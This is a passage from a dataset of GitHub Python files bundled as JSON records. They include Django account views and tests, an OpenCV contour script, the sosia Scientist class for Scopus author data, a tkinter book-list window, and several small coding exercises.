len(map)<j-i+1:\n while len(map)<j-i+1:\n map[arr[i]]-=1\n if map[arr[i]]==0:\n del map[arr[i]]\n i+=1\n if len(map)==j-i+1:\n maxLen=max(maxLen,j-i+1)\n j+=1\n return maxLen\nstr=\"aabbcc\"\nprint(longestSubstringWithoutRepeatingChar(str))","repo_name":"NIDHISH99444/InterviewPrep2022Dec21","sub_path":"SlidingWindow/7LongestSubstringWithoutRepeatingChar.py","file_name":"7LongestSubstringWithoutRepeatingChar.py","file_ext":"py","file_size_in_byte":545,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13001618625","text":"from django.shortcuts import render, redirect, HttpResponseRedirect, reverse\nfrom django.contrib.auth import logout as auth_logout\nfrom django.contrib.auth import login as auth_login\nfrom django.views.generic.edit import FormView\nfrom .forms import LegalAccountForm, LoginForm, AccountForm, PasswordResetForm, EditAccountForm, EditLegalAccountForm, EditUserForm\nfrom .models import Account, User\nfrom django.contrib.auth.views import PasswordResetView, PasswordResetConfirmView\nfrom django.contrib.auth.decorators import login_required\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.contrib.auth import update_session_auth_hash\nfrom django.core.mail import EmailMultiAlternatives\nfrom django.template.loader import get_template, render_to_string\nfrom django.contrib.sites.shortcuts import get_current_site\nfrom .tokens import account_activation_token\nfrom django.utils.encoding import force_bytes, force_text\nfrom django.utils.http import urlsafe_base64_encode, urlsafe_base64_decode \n\ndef login(request):\n if request.user.is_authenticated:\n return HttpResponseRedirect(reverse('home'))\n form = LoginForm()\n success = None\n if request.META.get('HTTP_REFERER') == request.build_absolute_uri('/auth/reset/Mw/set-password/'):\n success = True\n if request.method == 'POST':\n form = LoginForm(data=request.POST)\n if form.is_valid():\n auth_login(request, form.get_user())\n return redirect('home')\n else:\n print(form.errors)\n context = {\n 'form':form,\n 'success':success,\n }\n return render(request, 'pages/login.html', context)\n\ndef register(request):\n if request.user.is_authenticated:\n return HttpResponseRedirect(reverse('home'))\n normal_form = AccountForm()\n legal_form = LegalAccountForm()\n success = None\n\n if 'submit-legal' in request.POST:\n legal_form = LegalAccountForm(request.POST)\n print(request.POST)\n if legal_form.is_valid():\n user = legal_form.save()\n activation_email(request, user, legal_form.cleaned_data['email'])\n success = True \n print(legal_form.errors)\n if 'submit-normal' in request.POST:\n normal_form = AccountForm(request.POST)\n if normal_form.is_valid():\n user = normal_form.save() \n activation_email(request, user, normal_form.cleaned_data['email']) \n success = True;\n print(normal_form.errors)\n\n context = {\n 'normal_form':normal_form,\n 'legal_form':legal_form,\n 'success':success,\n }\n\n return render(request, 'pages/registration.html', context)\n\n\ndef activation_email(request, user, email):\n current_site = get_current_site(request)\n subject = 'Activate your account.'\n content = {\n 'user':user,\n 'domain': current_site.domain,\n 'uid':urlsafe_base64_encode(force_bytes(user.pk)),\n 'token':account_activation_token.make_token(user),\n }\n text_content = render_to_string('pages/email_template_registration_confirmation.html', content)\n htmly = get_template('pages/email_template_registration_confirmation.html')\n \n\n html_content = htmly.render(content)\n msg = EmailMultiAlternatives(subject, text_content, 'kristian.petrov@pytek.bg', [email])\n msg.attach_alternative(html_content, \"text/html\")\n print(msg)\n msg.send()\n\n\ndef activate(request, uidb64, token):\n try:\n uid = force_text(urlsafe_base64_decode(uidb64))\n user = User.objects.get(pk=uid)\n except(TypeError, ValueError, OverflowError, User.DoesNotExist):\n user = None\n if user is not None and account_activation_token.check_token(user, token):\n user.is_active = True\n user.save()\n return redirect('home')\n return HttpResponse('Thank you for your email confirmation. Now you can login your account.')\n else:\n return HttpResponse('Activation link is invalid!')\n\n\n@login_required\ndef logout(request):\n auth_logout(request)\n return redirect('login')\n\n@login_required\ndef myprofile_normal(request):\n if request.user.is_legal == True:\n return redirect('my-profile-legal')\n user = Account.objects.get(user=request.user)\n\n user_form = EditUserForm(user=request.user, initial={'username':user.user.username})\n account_form = EditAccountForm(instance=user, initial={\n 'name': user.name,\n 'email': user.user.email,\n 'phone': user.phone,\n 'club_card': user.club_card,\n 'adress': user.adress,\n 'city': user.city,\n 'region': user.region,\n 'zip_code': user.zip_code\n })\n success = None\n if \"change-user\" in request.POST:\n user_form = EditUserForm(user=request.user,data=request.POST)\n if user_form.is_valid():\n user_form.save()\n update_session_auth_hash(request, user_form.user)\n success = 'user-change'\n\n elif 'change-personal' in request.POST:\n account_form = EditAccountForm(request.POST, instance=user, )\n if account_form.is_valid():\n account_form.save()\n success = 'personal-change'\n\n context = {\n 'success':success,\n 'user_form':user_form,\n 'account_form':account_form,\n }\n return render(request, 'pages/my-profile.html', context)\n\n\n@login_required\ndef myprofile_legal(request):\n if request.user.is_normal == True:\n return redirect('my-profile-normal')\n user_form = EditUserForm(user=request.user, initial={'username':user.user.username})\n legal_form = EditLegalAccountForm(instance=user, initial={\n 'name': user.name,\n 'email': user.user.email,\n 'phone': user.phone,\n 'club_card': user.club_card,\n 'adress': user.adress,\n 'city': user.city,\n 'region': user.region,\n 'zip_code': user.zip_code,\n 'mol': user.mol,\n 'eik': user.eik,\n 'dds_number': user.dds_number,\n 'tax_address': user.tax_address,\n 'delivery_adress': user.delivery_adress,\n })\n if \"change-user\" in request.POST:\n user_form = EditUserForm(user=request.user,data=request.POST)\n if user_form.is_valid():\n user_form.save()\n update_session_auth_hash(request, user_form.user)\n success = 'user-change'\n elif 'change-personal' in request.POST:\n legal_form = EditLegalAccountForm(request.POST, instance=user, )\n if legal_form.is_valid():\n legal_form.save()\n success = 'personal-change'\n else:\n success = None\n context = {\n 'success':success,\n 'user_form':user_form,\n 'legal_form':legal_form,\n }\n return render(request, 'pages/my-profile.html', context)\n\n\nclass ExtendPasswordResetView(PasswordResetView):\n success = None\n def get_context_data(self, **kwargs,):\n context = super(ExtendPasswordResetView, self).get_context_data(**kwargs)\n context['success'] = self.success\n return context\n\n","repo_name":"KikoIsHere/Django-store","sub_path":"users/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7023,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"75154782248","text":"# 1. Create a child class Car that will inherit all\n# of the variables and methods of Vehicle class?\n\n\nclass Vehicle():\n def vdetails(self,model,type,regno):\n self.model=model\n self.type=type\n self.regno=regno\n print(self.model,self.type,self.regno)\nclass Car(Vehicle):\n def cdetails(self,brand,price,year):\n self.brand=brand\n self.price=price\n self.year=year\n print(\"Brand :\",self.brand)\n print(\"price :\",self.price)\n print(\"Year :\",self.year)\n print(self.model, \"reg no\", self.regno)\n\n\nca=Car()\nca.vdetails(\"civic\",\"car\",\"KL45P4563\")\nca.cdetails(\"honda\",1236547,2018)\n\n\n","repo_name":"krishnanunni-pr/Pyrhon-Django","sub_path":"Exam2/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":655,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36762014716","text":"from django.test import TestCase\nfrom django.core.urlresolvers import reverse\n\n\nclass ViewTests(TestCase):\n\n def test_index(self):\n response = self.client.get(reverse('index'))\n assert response.status_code == 200\n assert response.context['headline']\n\n\nclass ErrorPageTests(TestCase):\n \n def test_404(self):\n response = self.client.get(reverse('404'))\n assert response.status_code == 404\n assert response.context['error_code']\n\n def test_500(self):\n response = self.client.get(reverse('500'))\n assert response.status_code == 500\n assert response.context['error_code']","repo_name":"aaronlelevier/django-payasyougo","sub_path":"payg/payg/tests/test_views.py","file_name":"test_views.py","file_ext":"py","file_size_in_byte":641,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72567414567","text":"import cv2\nimport numpy as np\n#import argparse\ndef get_gray(img):#灰階\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n \n return gray\n\ndef get_blurred(img):#模糊化\n gray = get_gray(img)\n blurred = cv2.GaussianBlur(gray,(7,7),0)\n \n return blurred\n\ndef get_binary(img):#黑白化\n blur= get_blurred(img)\n ret,binary = cv2.threshold(blur,127,255,cv2.THRESH_BINARY)\n \n return binary\ndef get_contours(img):#獲取輪廓\n binary = get_binary(img)\n contours,hierachy = cv2.findContours(binary,cv2.RETR_CCOMP,cv2.CHAIN_APPROX_NONE)\n \n return contours\ndef draw_contours(img):#畫輪廓\n \n contours = get_contours(img)\n cv2.drawContours(img,contours,-1,(0,0,255),3)\n \n return None\n\n\ndef all_contour_X_Y(img):#要返回所有輪廓的X,Y值\n \n g_img = get_gray(img)\n binary_img = get_binary(g_img)\n cnt = get_contours(binary_img)\n draw_contours(img,cnt,-1(0,0,255),3)\n\n return img\n\n\n\n\n \n\"\"\" lefttext = 'L'+str(Num+1)\n cv2.putText(im, lefttext, (leftmost), cv2.FONT_HERSHEY_DUPLEX,1, (0, 255, 255), 1, cv2.LINE_AA)\n print (leftmost)# show point and check \n \"\"\"\n\"\"\"\n print (centerX)\n print (centerY)\n \n print (\"X=\",leftY[0]/(-1*mRB[0]))\n print ('left point ',left_point)\n print ('bottom point ',bottom_point)\n print ('right point ',right_point)\n print( 'mRb' ,mRB) #把numpy轉換成list\n print('mLB',mLB)\n \"\"\"\n # cv2.imshow('123',binary)\n \n #cv2.waitKey()\n#im = cv2.imread('2object.JPG')\nim = cv2.imread('photo1.png')\nim = cv2.resize(im, (1000, 1000), interpolation=cv2.INTER_CUBIC)\ngray = cv2.cvtColor(im, cv2.COLOR_BGR2GRAY)\nblurred = cv2.GaussianBlur(gray,(13,13),0)\nret,binary = cv2.threshold(blurred,127,255,cv2.THRESH_BINARY)\nlow_threshold = 1\nhigh_threshold = 10\nedges = cv2.Canny(binary, low_threshold, high_threshold)\nkernel = np.ones((5,5), np.uint8)\ndilation = cv2.dilate(edges, kernel, iterations = 1)\nerosion = cv2.erode(dilation, kernel, iterations = 1)\ncontours,hierachy = cv2.findContours(erosion,cv2.RETR_CCOMP,cv2.CHAIN_APPROX_NONE)\n#cv2.drawContours(im,contours,-1,(0,0,255),3)\ncnt_count = []\n#cnt_count_index = cnt_count -1\ncenterX =[]\ncenterY =[]\nfor cnt in range(len(contours)):\n epsilon = 0.01 * cv2.arcLength(contours[cnt], True)\n approx = cv2.approxPolyDP(contours[cnt], epsilon, True)\n #print(len(approx))\n area = cv2.contourArea(contours[cnt])\n if( area >1000):\n print('輪廓號=',cnt,'角點數=', len(approx))\n cv2.drawContours(im, contours[cnt], -1, (255, 255, 255), 3)\n M = cv2.moments(contours[cnt])\n if M[\"m00\"] != 0:\n cX = int(M[\"m10\"] / M[\"m00\"])\n cY = int(M[\"m01\"] / M[\"m00\"])\n # print(area)\n cnt_count.append(cnt)\n centerX.append(cX)\n centerY.append(cY)\n #cnt_count = cnt_count + 1\n text = str(cnt)\n cv2.putText(im, text, (cX + 5, cY), cv2.FONT_HERSHEY_DUPLEX, 1, (0, 255, 255), 1, cv2.LINE_AA)\n cv2.circle(im, (cX, cY), 10, (1, 227, 254), -1)\n\n\nleft_point = [] #define for save 4 most point\nright_point = []\ntop_point = []\nbottom_point = []\n##############################################\n\nmRB=[]\nmLB=[]\nfor Num in range(len(cnt_count)):\n cnt = contours[cnt_count[Num]]\n leftmost = tuple(cnt[cnt[:,:,0].argmin()][0])\n rightmost = tuple(cnt[cnt[:,:,0].argmax()][0])\n topmost = tuple(cnt[cnt[:,:,1].argmin()][0])\n bottommost = tuple(cnt[cnt[:,:,1].argmax()][0])\n ## get 4 most point \n cv2.circle(im,leftmost,10,[0,90,255],-1)\n cv2.circle(im,topmost,10,[0,90,255],-1)\n cv2.circle(im,rightmost,10,[0,90,255],-1)\n cv2.circle(im,bottommost,10,[0,90,255],-1)\n ## draw 4 most point \n left_point.append(leftmost)\n right_point.append(rightmost)\n top_point.append(topmost)\n bottom_point.append(bottommost)\n ## tuple type change to list type\n npleft = np.array(left_point)\n npright = np.array(right_point)\n #nptop = np.array(top_point)\n npbottom = np.array(bottom_point)\n ## change list to np.array\n leftX = list(npleft [ : , 0 ] )\n rightX= list(npright [ : , 0 ] )\n #topX = list(nptop [ : , 0 ] )\n bottomX=list(npbottom [ : , 0 ] )\n leftY=list(npleft [ : , 1 ] )\n rightY=list(npright [ : , 1 ] )\n #topY=list(nptop [ : , 1 ] )\n bottomY=list(npbottom [ : , 1 ] )\n mRB.append((bottomY[Num]-rightY[Num])/(bottomX[Num]-rightX[Num]))\n mLB.append((bottomY[Num]-leftY[Num])/(bottomX[Num]-leftX[Num]))\n X_position=leftY[0]/(-1*mRB[0])\n \"\"\"\nprint (centerX)\nprint (centerY)\n \nprint (\"X=\",leftY[0]/(-1*mRB[0]))\nprint ('left point ',left_point)\nprint ('bottom point ',bottom_point)\nprint ('right point ',right_point)\nprint( 'mRb' ,mRB) #把numpy轉換成list\nprint('mLB',mLB)\n\"\"\"\ncv2.imshow('edges',edges)\ncv2.imshow('im',im)\ncv2.imshow('bin',binary)\n \ncv2.waitKey()","repo_name":"harry123180/opencv_find_objects","sub_path":"GMTCV/GMTCV.py","file_name":"GMTCV.py","file_ext":"py","file_size_in_byte":4884,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11133020886","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# Author: Michael E. Rose <michael.ernst.rose@gmail.com>\n\"\"\"Super class to represent a scientist.\"\"\"\n\nfrom warnings import warn\n\nfrom pybliometrics.scopus import AbstractRetrieval, AffiliationRetrieval\nfrom pybliometrics.scopus.exception import Scopus404Error\n\nfrom sosia.establishing import connect_database, DEFAULT_DATABASE\nfrom sosia.processing import add_source_names, base_query, count_citations,\\\n extract_authors, find_main_affiliation, get_authors, get_main_field,\\\n maybe_add_source_names, read_fields_sources_list\nfrom sosia.utils import accepts\n\n\nclass Scientist(object):\n @property\n def active_year(self):\n \"\"\"The scientist's most recent year with publication(s) before\n provided year (which may be the same).\n \"\"\"\n return self._active_year\n\n @active_year.setter\n @accepts(int)\n def active_year(self, val):\n self._active_year = val\n\n @property\n def affiliation_country(self):\n \"\"\"The current country of the affiliation defined in affiliation_id.\"\"\"\n return self._affiliation_country\n\n @affiliation_country.setter\n @accepts(str)\n def affiliation_country(self, val):\n self._affiliation_country = val\n\n @property\n def affiliation_id(self):\n \"\"\"The affiliation ID (as string) of the scientist's most frequent\n affiliation in or before the active year.\n \"\"\"\n return self._affiliation_id\n\n @affiliation_id.setter\n @accepts(str)\n def affiliation_id(self, val):\n self._affiliation_id = val\n\n @property\n def affiliation_name(self):\n \"\"\"The current name of the affiliation defined in affiliation_id.\"\"\"\n return self._affiliation_name\n\n @affiliation_name.setter\n @accepts(str)\n def affiliation_name(self, val):\n self._affiliation_name = val\n\n @property\n def affiliation_type(self):\n \"\"\"The current type of the affiliation defined in affiliation_id.\"\"\"\n return self._affiliation_type\n\n @affiliation_type.setter\n @accepts(str)\n def affiliation_type(self, val):\n self.affiliation_type = val\n\n @property\n def citations(self):\n \"\"\"The citations of the scientist until the provided year.\"\"\"\n return self._citations\n\n @citations.setter\n @accepts(int)\n def citations(self, val):\n self._citations = val\n\n @property\n def citations_period(self):\n \"\"\"The citations of the scientist during the given period.\"\"\"\n return self._citations_period\n\n @citations_period.setter\n @accepts(int)\n def citations_period(self, val):\n self._citations_period = val\n\n @property\n def coauthors(self):\n \"\"\"Set of coauthors of the scientist on all publications until the\n provided year.\n \"\"\"\n return self._coauthors\n\n @coauthors.setter\n @accepts((set, list, tuple))\n def coauthors(self, val):\n self._coauthors = val\n\n @property\n def coauthors_period(self):\n \"\"\"Set of coauthors of the scientist on all publications during the\n given period.\n \"\"\"\n return self._coauthors_period\n\n @coauthors_period.setter\n @accepts((set, list, tuple))\n def coauthors_period(self, val):\n self._coauthors_period = val\n\n @property\n def fields(self):\n \"\"\"The fields of the scientist until the provided year, estimated from\n the sources (journals, books, etc.) she published in.\n \"\"\"\n return self._fields\n\n @fields.setter\n @accepts((set, list, tuple))\n def fields(self, val):\n self._fields = val\n\n @property\n def first_year(self):\n \"\"\"The scientist's year of first publication.\"\"\"\n return self._first_year\n\n @first_year.setter\n @accepts(int)\n def first_year(self, val):\n self._first_year = val\n\n @property\n def first_name(self):\n \"\"\"The scientist's first name.\"\"\"\n return self._first_name\n\n @first_name.setter\n @accepts(str)\n def first_name(self, val):\n self._name = val\n\n @property\n def main_field(self):\n \"\"\"The scientist's main field of research, as tuple in\n the form (ASJC code, general category).\n\n The main field is the field with the most publications, provided it\n is not Multidisciplinary (ASJC code 1000). In case of an equal number\n of publications, preference is given to non-general fields (those\n whose ASJC ends on a digit other than 0).\n \"\"\"\n return self._main_field\n\n @main_field.setter\n def main_field(self, val):\n if not isinstance(val, tuple) or len(val) != 2:\n raise Exception(\"Value must be a two-element tuple.\")\n self._main_field = val\n\n @property\n def name(self):\n \"\"\"The scientist's complete name.\"\"\"\n return self._name\n\n @name.setter\n @accepts(str)\n def name(self, val):\n self._name = val\n\n @property\n def language(self):\n \"\"\"The language(s) of the scientist published in.\"\"\"\n return self._language\n\n @language.setter\n @accepts(str)\n def language(self, val):\n self._language = val\n\n @property\n def publications(self):\n \"\"\"List of the scientists' publications.\"\"\"\n return self._publications\n\n @publications.setter\n @accepts((set, list, tuple))\n def publications(self, val):\n self._publications = val\n\n @property\n def publications_period(self):\n \"\"\"The publications of the scientist published during\n the given period.\n \"\"\"\n return self._publications_period\n\n @publications_period.setter\n @accepts((set, list, tuple))\n def publications_period(self, val):\n self._publications_period = val\n\n @property\n def sources(self):\n \"\"\"The Scopus IDs of sources (journals, books) in which the\n scientist published in.\n \"\"\"\n return self._sources\n\n @sources.setter\n @accepts((list, tuple))\n def sources(self, val):\n self._sources = maybe_add_source_names(val, self.source_names)\n\n @property\n def surname(self):\n \"\"\"The scientist's surname.\"\"\"\n return self._surname\n\n @surname.setter\n @accepts(str)\n def surname(self, val):\n self._name = val\n\n @property\n def subjects(self):\n \"\"\"The subject areas of the scientist's publications.\"\"\"\n return self._subjects\n\n @subjects.setter\n @accepts((set, list, tuple))\n def subjects(self, val):\n self._subjects = val\n\n def __init__(self, identifier, year, refresh=False, period=None, eids=None,\n sql_fname=None):\n \"\"\"Class to represent a scientist.\n\n Parameters\n ----------\n identifier : list of int\n List of Scopus Author IDs of the scientist.\n\n year : str or numeric\n Year for which characteristics should be defined for.\n\n refresh : boolean or int (optional, default=False)\n Whether to refresh cached results (if they exist) or not. If int\n is passed, results will be refreshed if they are older than\n that value in number of days.\n\n eids : list (optional, default=None)\n A list of scopus EIDs of the publications of the scientist. If\n it is provided, the scientist's properties are set based on these\n publications, instead of the list of publications obtained from\n the Scopus Author ID(s).\n\n period: int (optional, default=None)\n In additional starting x years prior to the treatment year,\n which is also used to compute characteristics in the treatment\n year.\n\n sql_fname : str (optional or pathlib.Path(), default=None)\n The path of the SQLite database to connect to. If None will\n default to `~/.cache/sosia/main.sqlite`.\n\n Raises\n ------\n Exception\n When there are no publications for the author until the\n provided year.\n \"\"\"\n self.identifier = identifier\n self.year = int(year)\n if not sql_fname:\n sql_fname = DEFAULT_DATABASE\n self.sql_conn = connect_database(sql_fname)\n\n # Read mapping of fields to sources\n fields, info = read_fields_sources_list()\n self.field_source = fields\n self.source_info = info\n source_names = self.source_info.set_index(\"source_id\")[\"title\"].to_dict()\n self.source_names = source_names\n\n # Load list of publications\n if eids:\n q = f\"EID({' OR '.join(eids)})\"\n else:\n q = f\"AU-ID({') OR AU-ID('.join([str(i) for i in identifier])})\"\n integrity_fields = [\"eid\", \"author_ids\", \"coverDate\", \"source_id\"]\n res = base_query(\"docs\", q, refresh, fields=integrity_fields)\n self._publications = [p for p in res if int(p.coverDate[:4]) <= year]\n if not len(self._publications):\n text = \"No publications found for author \"\\\n f\"{'-'.join([str(i) for i in identifier])} until {year}\"\n raise Exception(text)\n self._eids = eids or [p.eid for p in self._publications]\n\n # First year of publication\n pub_years = [p.coverDate[:4] for p in self._publications]\n self._first_year = int(min(pub_years))\n self._period_year = self.year - (period or (self.year+1)) + 1\n if self._period_year < self._first_year:\n self._period_year = 0\n\n # Count of citations\n search_ids = eids or identifier\n self._citations = count_citations(search_ids, self.year+1, identifier)\n\n # Coauthors\n self._coauthors = set(extract_authors(self._publications)) - set(identifier)\n\n # Period counts simply set to total if period is or goes back to None\n if self._period_year:\n pubs = [p for p in self._publications if\n self._period_year <= int(p.coverDate[:4]) <= year]\n self._publications_period = pubs\n if not len(self._publications_period):\n text = \"No publications found for author \"\\\n f\"{'-'.join([str(i) for i in identifier])} until \"\\\n f\"{year} in a {self._period_year}-years period\"\n raise Exception(text)\n eids_period = [p.eid for p in self._publications_period]\n n_cits = count_citations(eids_period, self.year+1, identifier)\n self._citations_period = n_cits\n self._coauthors_period = set(extract_authors(self._publications_period))\n self._coauthors_period -= set(identifier)\n else:\n self._coauthors_period = None\n self._publications_period = None\n self._citations_period = None\n\n # Author search information\n source_ids = set([int(p.source_id) for p in self._publications\n if p.source_id])\n self._sources = add_source_names(source_ids, self.source_names)\n self._active_year = int(max(pub_years))\n mask = fields[\"source_id\"].isin(source_ids)\n self._fields = fields[mask][\"asjc\"].astype(int).tolist()\n self._main_field = get_main_field(self._fields)\n if not self._main_field[0]:\n text = \"Not possible to determine research field(s) of \"\\\n \"researcher. Functionality is reduced.\"\n warn(text, UserWarning)\n\n # Most recent geolocation\n afid = find_main_affiliation(identifier, self._publications, year)\n self._affiliation_id = afid\n try:\n aff = AffiliationRetrieval(afid, refresh=refresh)\n self._affiliation_country = aff.country\n self._affiliation_name = aff.affiliation_name\n self._affiliation_type = aff.org_type\n except (Scopus404Error, ValueError):\n self._affiliation_country = None\n self._affiliation_name = None\n self._affiliation_type = None\n self._language = None\n\n # Author name from profile with most documents\n df = get_authors(self.identifier, self.sql_conn,\n refresh=refresh, verbose=False)\n au = df.sort_values(\"documents\", ascending=False).iloc[0]\n self._subjects = [a.split(\" \")[0] for a in au.areas.split(\"; \")]\n self._surname = au.surname or None\n self._first_name = au.givenname or None\n name = \", \".join([self._surname or \"\", au.givenname or \"\"])\n if name == \", \":\n name = None\n self._name = name\n\n def get_publication_languages(self, refresh=False):\n \"\"\"Parse languages of published documents.\"\"\"\n langs = set()\n for eid in self._eids:\n try:\n ab = AbstractRetrieval(eid, view=\"FULL\", refresh=refresh)\n except Scopus404Error:\n continue\n langs.add(ab.language)\n self._language = \"; \".join(sorted(filter(None, langs)))\n return self\n","repo_name":"sosia-dev/sosia","sub_path":"sosia/classes/scientist.py","file_name":"scientist.py","file_ext":"py","file_size_in_byte":13012,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"53"} +{"seq_id":"70312075369","text":"import customtkinter as ctk\nfrom settings import *\nimport sqlite3\n\n\nclass WindowSlideBooks():\n \n bool_window = False # variável de classe\n \n def __init__(self, parent):\n \n \n\n # layout\n parent.columnconfigure(0, weight=1, uniform='a')\n parent.rowconfigure((0,1,2,3,4,5,6,7,8,9), weight=1, uniform='a')\n \n # fonts\n font = ctk.CTkFont(family=FONT, size=24, weight='bold')\n font_buttons = ctk.CTkFont(family=FONT, size=24, weight='bold')\n \n \n # frames\n main_frame = ctk.CTkFrame(parent, fg_color=DARK_GRAY, )\n main_frame.grid(column=0, row=0, rowspan=10, sticky='nsew', pady=0, padx=0)\n \n main_frame.columnconfigure(0, weight=1, uniform='b')\n main_frame.rowconfigure(0, weight=1, uniform='b')\n main_frame.rowconfigure(1, weight=9, uniform='b')\n main_frame.rowconfigure(2, weight=1, uniform='b')\n \n top_frame = ctk.CTkFrame(main_frame, fg_color=LIGHT_BLUE, corner_radius=20)\n top_frame.grid(column=0, row=0, sticky='nsew', pady=5, padx=5)\n \n middle_frame = ctk.CTkFrame(main_frame, fg_color='transparent', )\n middle_frame.grid(column=0, row=1, sticky='nsew', pady=5, padx=5)\n middle_frame.columnconfigure(0, weight=1, uniform='c')\n middle_frame.rowconfigure(0, weight=1, uniform='c')\n middle_frame.rowconfigure(1, weight=14, uniform='c')\n \n segmented_frame = ctk.CTkFrame(middle_frame, fg_color= 'transparent', corner_radius=20)\n segmented_frame.grid(column=0, row=0, sticky='nsew', pady=0, padx=0)\n \n scroll_frame = ctk.CTkScrollableFrame(middle_frame, fg_color=BLACK, corner_radius=20)\n scroll_frame.grid(column=0, row=1, sticky='nsew', pady=10, padx=10)\n scroll_frame.columnconfigure(0, weight=5, uniform='d')\n scroll_frame.columnconfigure(1, weight=1, uniform='d')\n scroll_frame.columnconfigure(2, weight=2, uniform='d')\n scroll_frame.rowconfigure((0,1,2,3,4), weight=1, uniform='d')\n \n self.scroll_frame = scroll_frame\n \n\n # text top\n text_top = ctk.CTkLabel(master=top_frame, text='Meus Livros', text_color=BLACK, font=font,\n fg_color='transparent',\n corner_radius=20)\n # text_top.grid(column=0,row=0, sticky='new', pady=0, padx=0)\n text_top.place(relx=0.5, rely=0.5, anchor='center')\n \n \n # back = ctk.CTkLabel(master=top_frame, text='>>', text_color=BLACK, font=font,\n # fg_color='transparent',\n # corner_radius=20)\n # back.place(relx=0.05, rely=0.5, anchor='center')\n \n \n \n \n \n # segmented button\n font_seg = ctk.CTkFont(family=FONT, size=15, weight='bold')\n segmented_button = ctk.CTkSegmentedButton(master=segmented_frame, corner_radius=20,\n values=['Todos', 'Lidos', 'Não Lidos'],\n border_width=5,\n selected_color=GRAY, text_color=LIGHT_BLUE, font=font_seg,\n unselected_color=BLACK, fg_color=BLACK, text_color_disabled=LIGHT_BLUE,\n selected_hover_color=GRAY, unselected_hover_color=GRAY,\n command=self.segmented_button_callback)\n segmented_button.set('Todos')\n segmented_button.place(relx=0.5, rely=0.5, anchor='center')\n # segmented_button.configure(state='disabled')\n # segmented_button.grid(column=0, row=0, sticky='nsew', pady=0, padx=0)\n \n \n \n \n self.show_books(scroll_frame)\n \n \n \n \n \n # add book button\n from .WindowAddBooks import WindowAddBooks\n add_book = ctk.CTkButton(master=main_frame, text='+', \n command=lambda: WindowAddBooks(scroll_frame),\n fg_color=LIGHT_BLUE,\n text_color=BLACK,\n font=font_buttons,\n width=50, height=50,\n corner_radius=100)\n # add_book.grid(column=0, row=2, columnspan=9, sticky='ns', pady=7)\n add_book.place(relx=0.5, rely=0.9425, anchor='center')\n \n \n \n def segmented_button_callback(self, value):\n if value == 'Todos':\n self.show_books(self.scroll_frame, filtro=None)\n elif value == 'Lidos':\n self.show_books(self.scroll_frame, filtro=1)\n elif value == 'Não Lidos':\n self.show_books(self.scroll_frame, filtro=0)\n \n \n \n def show_books(self, scroll_frame, filtro=None):\n # limpar frame\n for widget in scroll_frame.winfo_children():\n widget.destroy()\n \n \n # mostrar livros cadastrados no banco de dados\n conn = sqlite3.connect('database.db')\n cursor = conn.cursor()\n if filtro == None:\n cursor.execute('SELECT * FROM livros ORDER BY id DESC')\n else:\n cursor.execute(f'SELECT * FROM livros WHERE status = {filtro} ORDER BY id DESC')\n livros = cursor.fetchall()\n conn.close()\n \n font = ctk.CTkFont(family=FONT, size=18)\n \n for i, livro in enumerate(livros):\n if livro[3] == None:\n \n ctk.CTkLabel(scroll_frame, text=f'{livro[1]} - {livro[2]}', font=font, \n height=40,\n text_color=WHITE, fg_color=DARK_GRAY, corner_radius=20).grid(row = i, pady=10, padx=10,\n sticky='nsew')\n else:\n \n ctk.CTkLabel(scroll_frame, text=f'{livro[1]} - {livro[2]}', font=font, \n height=40,\n text_color=LIGHT_BLUE, fg_color=DARK_GRAY, corner_radius=20).grid(column=0, row=i, pady=10, padx=10,\n sticky='nsew')\n ctk.CTkLabel(scroll_frame, text=f'{livro[3]}', font=font, height=40,\n text_color=LIGHT_BLUE, fg_color=DARK_GRAY, corner_radius=20).grid(column=1, row=i, pady=10, padx=0,\n sticky='nsew')\n nota = \" ★ \" * livro[4]\n \n ctk.CTkLabel(scroll_frame, text=f'{nota}', font=font, height=40,\n text_color=LIGHT_BLUE, fg_color=DARK_GRAY, corner_radius=20).grid(column=2, row=i, pady=10, padx=10,\n sticky='nsew')\n \n \n \n \n ","repo_name":"EduardoWS/e-library","sub_path":"widgets/WindowSlideBooks.py","file_name":"WindowSlideBooks.py","file_ext":"py","file_size_in_byte":7124,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36259993465","text":"class Solution:\n def addToArrayForm(self, A, K):\n helper = []\n num_a = 0\n carry = 0\n while len(A) > 0:\n num_a = num_a + A.pop() * (10 ** carry)\n carry += 1\n num = num_a + K\n while num > 0:\n addons = num % 10\n num = int(num / 10)\n helper.insert(0, addons)\n return helper\n\n\nslu = Solution()\nprint(slu.addToArrayForm([1, 2, 0, 1], 34))\n","repo_name":"kefirzhang/algorithms","sub_path":"leetcode/python/easy/p989_addToArrayForm.py","file_name":"p989_addToArrayForm.py","file_ext":"py","file_size_in_byte":440,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72390585448","text":"import requests\nfrom bs4 import BeautifulSoup\nimport bs4\n##步骤1:从网页获取大学排名内容\n##步骤2:提取内容到特定的数据结构\n##步骤3:利用数据结构来展示数据\ndef getHTMLText(url):\n\ttry:\n\t\tr=requests.get(url,timeout=30)\n\t\tr.raise_for_status\n\t\tr.encoding=r.apparent_encoding\n\t\treturn r.text\n\texcept :\n\t\treturn \"\"\n\ndef fillUniList(ulist,html):\n\tsoup=BeautifulSoup(html,'html.parser')\n\tfor tr in soup.find('tbody').children:\n\t\tif isinstance(tr,bs4.element.Tag):\n\t\t\ttds=tr('td')\n\t\t\tulist.append([tds[0].string,tds[1].string,tds[4].string])\ndef printUniList(ulist,num):\n\tprint('{0:^10}\\t{1:^10}\\t{2:^10}'.format('排名','学校','评分',chr(12288)))\n\tfor i in 